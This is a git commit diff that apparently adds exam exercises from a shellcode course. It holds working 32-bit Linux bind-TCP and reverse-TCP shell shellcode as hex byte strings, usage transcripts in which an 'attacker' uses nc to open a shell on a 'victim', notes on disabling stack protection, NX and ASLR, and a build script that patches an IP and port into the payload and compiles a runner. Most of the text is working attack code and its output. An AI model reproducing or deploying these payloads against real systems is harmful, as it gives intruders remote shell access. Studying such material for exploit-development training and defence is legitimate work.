minor updates

2013-03-13 00:06:45 +01:00 · 2013-03-13 00:06:45 +01:00 · 95690185f2
commit 95690185f2
parent df23a2c20b
4 changed files with 238 additions and 0 deletions
--- a/exam1/USAGE
+++ b/exam1/USAGE
@ -0,0 +1,34 @@
+USAGE
+
+
+1. Compile the shellcode
+
+$ ./compile_all.sh shell_bind_tcp 50123
+ [I] Using custom port: 50123
+ [+] Assembling shell_bind_tcp.nasm with NASM ...
+ [+] Linking shell_bind_tcp.o ...
+ [+] Generating shellcode with objdump ...
+ [+] Checking shellcode for NULLs ...
+ [+] Shellcode size is 141 bytes
+"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xc3\xcb"
+ [+] Generating shellcode.c file with the shell_bind_tcp shellcode ...
+ [+] Compiling shellcode.c with GCC ...
+ [+] All done! You can run the shellcode now: 
+$ ./shellcode
+
+
+1. Run the shellcode on the victim machine
+
+victim $ ./shellcode 
+Shellcode Length:  141
+
+victim # netstat --inet -apn |grep shellcode
+tcp        0      0 0.0.0.0:50123               0.0.0.0:*                   LISTEN      982/./shellcode
+
+
+2. Attacker can now connect and get the shell
+
+attacker $ nc localhost 50123
+id
+uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+
--- a/exam2/NOTES
+++ b/exam2/NOTES
@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program
--- a/exam2/USAGE
+++ b/exam2/USAGE
@ -0,0 +1,35 @@
+USAGE
+
+1. attacker has 192.168.1.149 IP and runs nc to listen on 55005 port
+
+attacker $ nc -vl 55005
+[do not close it]
+
+
+2. Running shellcode a victim server
+exam2$ ./compile_all.sh shell_reverse_tcp 192.168.1.149 55005
+ [I] Using custom port: 55005
+ [+] Assembling shell_reverse_tcp.nasm with NASM ...
+ [+] Linking shell_reverse_tcp.o ...
+ [+] Generating shellcode with objdump ...
+ [+] Checking shellcode for NULLs ...
+ [+] Shellcode size is 117 bytes
+"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x51\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x31\xd2\xff\x37\x66\xff\x77\x04\x4b\x66\x53\x43\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x89\xd8\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\xaa\xff\xff\xff\xc0\xa8\x01\x95\xd6\xdd"
+ [+] Generating shellcode.c file with the shell_reverse_tcp shellcode ...
+ [+] Compiling shellcode.c with GCC ...
+ [+] All done! You can run the shellcode now: 
+$ ./shellcode
+
+exam2$ ./shellcode 
+Shellcode Length:  117
+
+
+3. Checking now your nc
+attacker $ nc -vl 55005
+Connection from 192.168.1.149 port 55005 [tcp/*] accepted
+id
+uid=500(arno) gid=500(arno) groups=500(arno),18(dialout),498(desktop_admin_r),501(vboxusers) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+
+
+Voila ! We've got a shell to a victim server.
+
--- a/exam2/compile_all.sh
+++ b/exam2/compile_all.sh
@ -0,0 +1,158 @@
+#!/usr/bin/env sh
+#
+# Creates a shell_reverse_tcp shellcode
+#
+# Example
+# ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357
+#
+# If no IP & Port specified, the default ones will be used 192.168.1.1 12357
+#
+# IP and Port are stored in last 6 bytes in HEX
+#
+
+ARG1=$1        # Specify program
+ARG2=$2        # Specify IP
+ARG3=$3        # Specify port
+
+#
+# Check script usage and file existence
+#
+if [ -z "$ARG1" ]; then
+  echo " [I] Please specify program you would like to assemble!"
+  echo " [I] Usage example: ./compile_all.sh shell_reverse_tcp 192.168.1.1 12357"
+  exit 1;
+elif [ -e "$ARG1" ]; then
+  if [[ $ARG1 == *nasm* ]]; then
+      ARG1=$(echo -ne $ARG1 |sed 's/.....$//g');
+     echo $ARG1
+  fi
+elif [ ! -e "$ARG1".nasm ]; then
+  ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g')
+  if [ -e "$ARG1_GUESS" ]; then
+    ARG1=$ARG1_GUESS
+  else
+    echo " [E] File "$ARG1" does not exist!"
+    exit 1;
+  fi
+fi
+
+
+#
+# Validate nasm source file
+#
+if ! $(grep -qi ^global $ARG1.nasm 2>/dev/null); then
+  echo " [E] The file "$ARG1.nasm" does not appear to be a correct NASM source!"
+  exit 1;
+fi
+
+
+#
+# Validate and Convert IP to HEX
+#
+function valid_ip()
+{
+    local  ip=$1
+    local  stat=1
+
+    if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
+        OIFS=$IFS
+        IFS='.'
+        ip=($ip)
+        IFS=$OIFS
+        [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 && \
+           ${ip[2]} -le 255 && ${ip[3]} -le 255 ]]
+        stat=$?
+    fi
+    return $stat
+}
+
+if [ -z "$ARG2" ]; then
+  echo " [E] Please specify IP"
+  exit 1;
+else
+  if valid_ip $ARG2; then
+    IPHEX=$(printf '%.2x' ${ARG2//./ } | sed 's/../\\x&/g')
+  else
+    echo " [E] IP is not valid!"
+    exit 1;
+  fi
+fi
+
+
+#
+# Port range check
+#
+if [ -z "$ARG3" ]; then
+  echo " [I] Default port will be used."
+  ARG3=12357;
+elif ! [[ $ARG3 -ge 1024 && $ARG3 -le 65535 ]]; then
+  echo " [E] The port must be in range 1024..65535 !"
+  exit 1;
+else
+  echo " [I] Using custom port: "$ARG3
+fi
+
+
+#
+# Assemble and link
+#
+echo " [+] Assembling "$ARG1".nasm with NASM ..."
+nasm -f elf32 -o $ARG1.o $ARG1.nasm && \
+echo " [+] Linking "$ARG1".o ..." && \
+ld -m elf_i386 -o $ARG1 $ARG1.o && \
+echo -e " [+] Generating shellcode with objdump ..." && \
+SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g')
+
+
+#
+# Set the custom port (if any was specified) for the shellcode
+#
+if [ -z "$ARG3" ]; then
+  FULL_SHELLCODE=$(echo $SHELLCODE)
+else
+  PORT_HEX=$(printf '%.4x' $ARG3 | sed 's/../\\x&/g')
+  FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........................$//' ; echo ${IPHEX}${PORT_HEX}"\"")
+fi
+
+
+#
+# Check shellcode for NULLs
+#
+echo " [+] Checking shellcode for NULLs ..."
+if [[ $FULL_SHELLCODE == *00* ]]; then
+  echo " [E] Your shellcode contains 00 (NULL) ! Most likely you need to change your IP or port."
+  exit 1
+fi
+
+echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n"
+echo $FULL_SHELLCODE
+
+
+#
+# Generate shellcode.c
+#
+echo " [+] Generating shellcode.c file with the "$ARG1" shellcode ..."
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+$FULL_SHELLCODE;
+
+main()
+{
+	printf("Shellcode Length:  %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+}
+EOF
+
+
+#
+# Compile C code with GCC
+#
+echo " [+] Compiling shellcode.c with GCC ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+echo -e " [+] All done! You can run the shellcode now: \n$ ./shellcode"
+